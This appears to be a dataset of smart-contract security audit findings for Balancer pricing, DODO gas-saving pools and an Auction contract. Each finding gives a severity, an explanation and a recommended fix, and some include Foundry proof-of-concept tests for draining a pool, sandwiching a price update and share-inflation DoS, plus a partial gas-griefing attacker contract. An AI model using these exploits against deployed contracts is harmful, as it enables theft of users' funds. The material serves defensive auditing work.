In various Balancer LP valuations, totalSupply() is used to determine the total LP supply. However this is not the appropriate method for determining the supply. Instead getActualSupply should be used instead. Depending on the which pool implementation and how much LP is deployed, the valuation can be much too high or too low. Since the RBS pricing is dependent on this metric. It could lead to RBS being deployed at incorrect prices.\\nAuraBalancerSupply.sol#L345-L362\\n```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo value each LP token the contract divides the valuation of the pool by the total supply of LP. This in itself is correct, however the totalSupply method for a variety of Balancer pools doesn't accurately reflect the true LP supply. If we take a look at a few Balancer pools we can quickly see the issue:\\nThis pool shows a max supply of 2,596,148,429,273,858 whereas the actual supply is 6454.48. In this case the LP token would be significantly undervalued. If a sizable portion of the reserves are deployed in an affected pool the backing per OHM would appear to the RBS system to be much lower than it really is. As a result it can cause the RBS to deploy its funding incorrectly, potentially selling/buying at a large loss to the protocol.
Use a try-catch block to always query getActualSupply on each pool to make sure supported pools use the correct metric.
Pool LP can be grossly under/over valued
```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n
Possible incorrect price for tokens in Balancer stable pool due to amplification parameter update
medium
Incorrect price calculation of tokens in StablePools if amplification factor is being updated\\nThe amplification parameter used to calculate the invariant can be in a state of update. In such a case, the current amplification parameter can differ from the amplificaiton parameter at the time of the last invariant calculation. The current implementaiton of `getTokenPriceFromStablePool` doesn't consider this and always uses the amplification factor obtained by calling `getLastInvariant`\\n```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n\\n```\\n // @audit the amplification parameter can be updated\\n function startAmplificationParameterUpdate(uint256 rawEndValue, uint256 endTime) external authenticate {\\n\\n // @audit for calculating the invariant the current amplification factor is obtained by calling _getAmplificationParameter()\\n function _onSwapGivenIn(\\n SwapRequest memory swapRequest,\\n uint256[] memory balances,\\n uint256 indexIn,\\n uint256 indexOut\\n ) internal virtual override whenNotPaused returns (uint256) {\\n (uint256 currentAmp, ) = _getAmplificationParameter();\\n uint256 amountOut = StableMath._calcOutGivenIn(currentAmp, balances, indexIn, indexOut, swapRequest.amount);\\n return amountOut;\\n }\\n```\\n
Use the latest amplification factor by callling the `getAmplificationParameter` function
In case the amplification parameter of a pool is being updated by the admin, wrong price will be calculated.
```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n
Incorrect deviation calculation in isDeviatingWithBpsCheck function
medium
The current implementation of the `isDeviatingWithBpsCheck` function in the codebase leads to inaccurate deviation calculations, potentially allowing deviations beyond the specified limits.\\nThe function `isDeviatingWithBpsCheck` checks if the deviation between two values exceeds a defined threshold. This function incorrectly calculates the deviation, considering only the deviation from the larger value to the smaller one, instead of the deviation from the mean (or TWAP).\\n```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n\\nThe function then call `_isDeviating` to calculate how much the smaller value is deviated from the bigger value.\\n```\\n function _isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return ((value0_ - value1_) * deviationMax_) / value0_ > deviationBps_;\\n }\\n```\\n\\nThe function `isDeviatingWithBpsCheck` is usually used to check how much the current value is deviated from the TWAP value to make sure that the value is not manipulated. Such as spot price and twap price in UniswapV3.\\n```\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n baseInQuotePrice,\\n baseInQuoteTWAP,\\n params.maxDeviationBps,\\n DEVIATION_BASE\\n )\\n ) {\\n revert UniswapV3_PriceMismatch(address(params.pool), baseInQuoteTWAP, baseInQuotePrice);\\n }\\n```\\n\\nThe issue is isDeviatingWithBpsCheck is not check the deviation of current value to the TWAP but deviation from the bigger value to the smaller value. This leads to an incorrect allowance range for the price, permitting deviations that exceed the acceptable threshold.\\nExample:\\nTWAP price: 1000 Allow deviation: 10%.\\nThe correct deviation calculation will use deviation from the mean. The allow price will be from 900 to 1100 since:\\n|1100 - 1000| / 1000 = 10%\\n|900 - 1000| / 1000 = 10%\\nHowever the current calculation will allow the price from 900 to 1111\\n(1111 - 1000) / 1111 = 10%\\n(1000 - 900) / 1000 = 10%\\nEven though the actual deviation of 1111 to 1000 is |1111 - 1000| / 1000 = 11.11% > 10%
To accurately measure deviation, the isDeviating function should be revised to calculate the deviation based on the mean value: `| spot value - twap value | / twap value`.
This miscalculation allows for greater deviations than intended, increasing the vulnerability to price manipulation and inaccuracies in Oracle price reporting.
```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n
Pool can be drained if there are no LP_FEES
high
The pool can be depleted because swaps allow the withdrawal of the entire balance, resulting in a reserve of 0 for a specific asset. When an asset's balance reaches 0, the PMMPricing algorithm incorrectly estimates the calculation of output amounts. Consequently, the entire pool can be exploited using a flash loan by depleting one of the tokens to 0 and then swapping back to the pool whatever is received.\\nFirstly, as indicated in the summary, selling quote/base tokens can lead to draining the opposite token in the pool, potentially resulting in a reserve of 0. Consequently, the swapping mechanism permits someone to entirely deplete the token balance within the pool. In such cases, the calculations within the pool mechanism become inaccurate. Therefore, swapping back to whatever has been initially purchased will result in acquiring more tokens, further exacerbating the depletion of the pool.\\nAllow me to provide a PoC to illustrate this scenario:\\n```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves "0".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the "_amount" already which will make the quote token reserve "0"\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log("Received quote amount by hippo", receivedQuoteAmount);\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log("Received base amount by hippo", receivedBaseAmount);\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log("Profit for attack", receivedBaseAmount - _amount);\\n }\\n```\\n\\nTest results and logs:
Do not allow the pools balance to be 0 or do not let LP_FEE to be 0 in anytime.
Pool can be drained, funds are lost. Hence, high. Though, this can only happen when there are no "LP_FEES". However, when we check the default settings of the deployment, we see here that the LP_FEE is set to 0. So, it is ok to assume that the LP_FEES can be 0.
```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves "0".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the "_amount" already which will make the quote token reserve "0"\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log("Received quote amount by hippo", receivedQuoteAmount);\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log("Received base amount by hippo", receivedBaseAmount);\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log("Profit for attack", receivedBaseAmount - _amount);\\n }\\n```\\n
Adjusting "_I_" will create a sandwich opportunity because of price changes
medium
Adjusting the value of "I" directly influences the price. This can be exploited by a MEV bot, simply by trading just before the "adjustPrice" function and exiting right after the price change. The profit gained from this operation essentially represents potential losses for the liquidity providers who supplied liquidity to the pool.\\nAs we can see in the docs, the "I" is the "i" value in here and it is directly related with the output amount a trader will receive when selling a quote/base token:\\nSince the price will change, the MEV bot can simply sandwich the tx. Here an example how it can be executed by a MEV bot:\\n```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log("Base target initial", gsp._BASE_TARGET_());\\n console.log("Quote target initial", gsp._QUOTE_TARGET_());\\n console.log("Base reserve initial", gsp._BASE_RESERVE_());\\n console.log("Quote reserve initial", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n console.log("Received base tokens", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n\\nTest result and logs:\\nAfter the sandwich, we can see that the MEV bot's DAI amount exceeds its initial DAI balance (profits). Additionally, the reserves for both base and quote tokens are less than the initial 10 tokens deposited by the tapir (only LP). The profit gained by the MEV bot essentially translates to a loss for the tapir.\\nAnother note on this is that even though the `adjustPrice` called by MAINTAINER without getting frontrunned, it still creates a big price difference which requires immediate arbitrages. Usually these type of parameter changes that impacts the trades are setted by time via ramping to mitigate the unfair advantages that it can occur during the price update.
Acknowledge the issue and use private RPC's to eliminate front-running or slowly ramp up the "I" so that the arbitrage opportunity is fair
null
```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log("Base target initial", gsp._BASE_TARGET_());\\n console.log("Quote target initial", gsp._QUOTE_TARGET_());\\n console.log("Base reserve initial", gsp._BASE_RESERVE_());\\n console.log("Quote reserve initial", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n console.log("Received base tokens", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n
First depositor can lock the quote target value to zero
medium
When the initial deposit occurs, it is possible for the quote target to be set to 0. This situation significantly impacts other LPs as well. Even if subsequent LPs deposit substantial amounts, the quote target remains at 0 due to multiplication with this zero value. 0 QUOTE_TARGET value will impact the swaps that pool facilities\\nWhen the first deposit happens, QUOTE_TARGET is set as follows:\\n```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n\\nIn this scenario, the 'shares' value can be a minimum of 1e3, as indicated here: link to code snippet.\\nThis implies that if someone deposits minuscule amounts of quote token and base token, they can set the QUOTE_TARGET to zero because the `mulFloor` operation uses a scaling factor of 1e18:\\n```\\nfunction mulFloor(uint256 target, uint256 d) internal pure returns (uint256) {\\n return target * d / (10 ** 18);\\n }\\n```\\n\\n```\\n// @review 0 + (0 * something) = 0! doesn't matter what amount has been deposited !\\n_QUOTE_TARGET_ = uint112(uint256(_QUOTE_TARGET_) + (DecimalMath.mulFloor(uint256(_QUOTE_TARGET_), mintRatio)));\\n```\\n\\nHere a PoC shows that if the first deposit is tiny the QUOTE_TARGET is 0. Also, whatever deposits after goes through the QUOTE_TARGET still 0 because of the multiplication with 0!\\n```\\nfunction test_StartWithZeroTarget() external {\\n // tapir deposits tiny amounts to make quote target 0\\n vm.startPrank(tapir);\\n dai.safeTransfer(address(gsp), 1 * 1e5);\\n usdc.transfer(address(gsp), 1 * 1e5);\\n gsp.buyShares(tapir);\\n\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n\\n // quote target is indeed 0!\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n\\n vm.stopPrank();\\n\\n // hippo deposits properly\\n vm.startPrank(hippo);\\n dai.safeTransfer(address(gsp), 1000 * 1e18);\\n usdc.transfer(address(gsp), 10000 * 1e6);\\n gsp.buyShares(hippo);\\n\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n\\n // although hippo deposited 1000 USDC as quote tokens, target is still 0 due to multiplication with 0\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n }\\n```\\n\\nTest result and logs:
According to the quote tokens decimals, multiply the quote token balance with the proper decimal scalor.
Since the quote target is important and used when pool deciding the swap math I will label this as high.
```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n
Share Price Inflation by First LP-er, Enabling DOS Attacks on Subsequent buyShares with Up to 1001x the Attacking Cost
medium
The smart contract contains a critical vulnerability that allows a malicious actor to manipulate the share price during the initialization of the liquidity pool, potentially leading to a DOS attack on subsequent buyShares operations.\\nThe root cause of the vulnerability lies in the initialization process of the liquidity pool, specifically in the calculation of shares during the first deposit.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n\\nIf the pool is empty, the smart contract directly sets the share value based on the minimium value of the base token denominated value of the provided assets. This assumption can be manipulated by a malicious actor during the first deposit, leading to a situation where the LP pool token becomes extremely expensive.\\nAttack Scenario\\nThe attacker exploits the vulnerability during the initialization of the liquidity pool:\\nThe attacker mints 1001 `shares` during the first deposit.\\nImmediately, the attacker sells back 1000 `shares`, ensuring to keep 1 wei via the `sellShares` function.\\nThe attacker then donates a large amount (1000e18) of base and quote tokens and invokes the `sync()` routine to pump the base and quote reserves to 1001 + 1000e18.\\nThe protocol users proceed to execute the `buyShares` function with a balance less than `attacker's spending * 1001`. The transaction reverts due to the `mintRatio` being kept below 1001 wad and the computed `shares` less than 1001 (line 71), while it needs a value >= 1001 to mint `shares` successfully.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 2. normal case\\n uint256 baseInputRatio = DecimalMath.divFloor(baseInput, baseReserve);\\n uint256 quoteInputRatio = DecimalMath.divFloor(quoteInput, quoteReserve);\\n uint256 mintRatio = quoteInputRatio < baseInputRatio ? quoteInputRatio : baseInputRatio; // <= FOUND: mintRatio below 1001wad if input amount smaller than reserves * 1001\\n // The shares will be minted to user\\n shares = DecimalMath.mulFloor(totalSupply, mintRatio); // <= FOUND: the manipulated totalSupply of 1wei requires a mintRatio of greater than 1000 for a successful _mint()\\n // rest of code\\n }\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPVault.sol\\n function _mint(address user, uint256 value) internal {\\n require(value > 1000, "MINT_AMOUNT_NOT_ENOUGH"); // <= FOUND: next buyShares with volume less than 1001 x attacker balance will revert here\\n// rest of code\\n }\\n```\\n\\nThe `_mint()` function fails with a "MINT_AMOUNT_NOT_ENOUGH" error, causing a denial-of-service condition for subsequent buyShares operations.\\nPOC\\n```\\n// File: dodo-gassaving-pool/test/GPSTrader.t.sol\\n function test_mint1weiShares_DOSx1000DonationVolume() public {\\n GSP gspTest = new GSP();\\n gspTest.init(\\n MAINTAINER,\\n address(mockBaseToken),\\n address(mockQuoteToken),\\n 0,\\n 0,\\n 1000000,\\n 500000000000000,\\n false\\n );\\n\\n // Buy 1001 shares\\n vm.startPrank(USER);\\n mockBaseToken.transfer(address(gspTest), 1001);\\n mockQuoteToken.transfer(address(gspTest), 1001 * gspTest._I_() / 1e18);\\n gspTest.buyShares(USER);\\n assertEq(gspTest.balanceOf(USER), 1001);\\n\\n // User sells shares and keep ONLY 1wei\\n gspTest.sellShares(1000, USER, 0, 0, "", block.timestamp);\\n assertEq(gspTest.balanceOf(USER), 1);\\n\\n // User donate a huge amount of base & quote tokens to inflate the share price\\n uint256 donationAmount = 1000e18;\\n mockBaseToken.transfer(address(gspTest), donationAmount);\\n mockQuoteToken.transfer(address(gspTest), donationAmount * gspTest._I_() / 1e18);\\n gspTest.sync();\\n vm.stopPrank();\\n\\n // DOS subsequent operations with roughly 1001 x donation volume\\n uint256 dosAmount = donationAmount * 1001;\\n mockBaseToken.mint(OTHER, type(uint256).max);\\n mockQuoteToken.mint(OTHER, type(uint256).max);\\n\\n vm.startPrank(OTHER);\\n mockBaseToken.transfer(address(gspTest), dosAmount);\\n mockQuoteToken.transfer(address(gspTest), dosAmount * gspTest._I_() / 1e18);\\n\\n vm.expectRevert("MINT_AMOUNT_NOT_ENOUGH");\\n gspTest.buyShares(OTHER);\\n vm.stopPrank();\\n }\\n```\\n\\nA PASS result would confirm that any deposits with volume less than 1001 times to attacker cost would fail. That means by spending $1000, the attacker can DOS any transaction with volume below $1001,000.
A mechanism should be implemented to handle the case of zero totalSupply during initialization. A potential solution is inspired by Uniswap V2 Core Code, which sends the first 1001 LP tokens to the zero address. This way, it's extremely costly to inflate the share price as much as 1001 times on the first deposit.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; \\n+ _mint(address(0), 1001); // permanently lock the first MINIMUM_LIQUIDITY of 1001 tokens, makes it imposible to manipulate the totalSupply to 1 wei\\n// rest of code\\n``` // rest of code\\n```\\n
The impact of this vulnerability is severe, as it allows an attacker to conduct DOS attacks on buyShares with a low attacking cost (retrievable for further attacks via sellShares). This significantly impairs the core functionality of the protocol, potentially preventing further LP operations and hindering the protocol's ability to attract Total Value Locked (TVL) for other trading operations such as sellBase, sellQuote and flashloan.
```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n
Attacker can force pause the Auction contract.
medium
In certain situations (e.g founders have ownership percentage greater than 51) an attacker can potentially exploit the `try catch` within the `Auction._CreateAuction()` function to arbitrarily pause the auction contract.\\nConsider the code from `Auction._CreateAuction()` function, which is called by `Auction.settleCurrentAndCreateNewAuction()`. It first tries to mint a new token for the auction, and if the minting fails the `catch` branch will be triggered, pausing the auction.\\n```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n\\nDue to the internal logic of the `mint` function, if there are founders with high ownership percentages, many tokens can be minted to them during calls to mintas part of the vesting mechanism. As a consequence of this under some circumstances calls to `mint` can consume huge amounts of gas.\\nCurrently on Ethereum and EVM-compatible chains, calls can consume at most 63/64 of the parent's call gas (See EIP-150). An attacker can exploit this circumstances of high gas cost to restrict the parent gas call limit, making `token.mint()` fail and still leaving enough gas left (1/64) for the `_pause()` call to succeed. Therefore he is able to force the pausing of the auction contract at will.\\nBased on the gas requirements (1/64 of the gas calls has to be enough for `_pause()` gas cost of 21572), then `token.mint()` will need to consume at least 1359036 gas (63 * 21572), consequently it is only possible on some situations like founders with high percentage of vesting, for example 51 or more.\\nConsider the following POC. Here we are using another contract to restrict the gas limit of the call, but this can also be done with an EOA call from the attacker.\\nExploit contract code:\\n```\\npragma solidity ^0.8.16;\\n\\ncontract Attacker {\\n function forcePause(address target) external {\\n bytes4 selector = bytes4(keccak256("settleCurrentAndCreateNewAuction()"));\\n assembly {\\n let ptr := mload(0x40)\\n mstore(ptr,selector)\\n let success := call(1500000, target, 0, ptr, 4, 0, 0)\\n }\\n 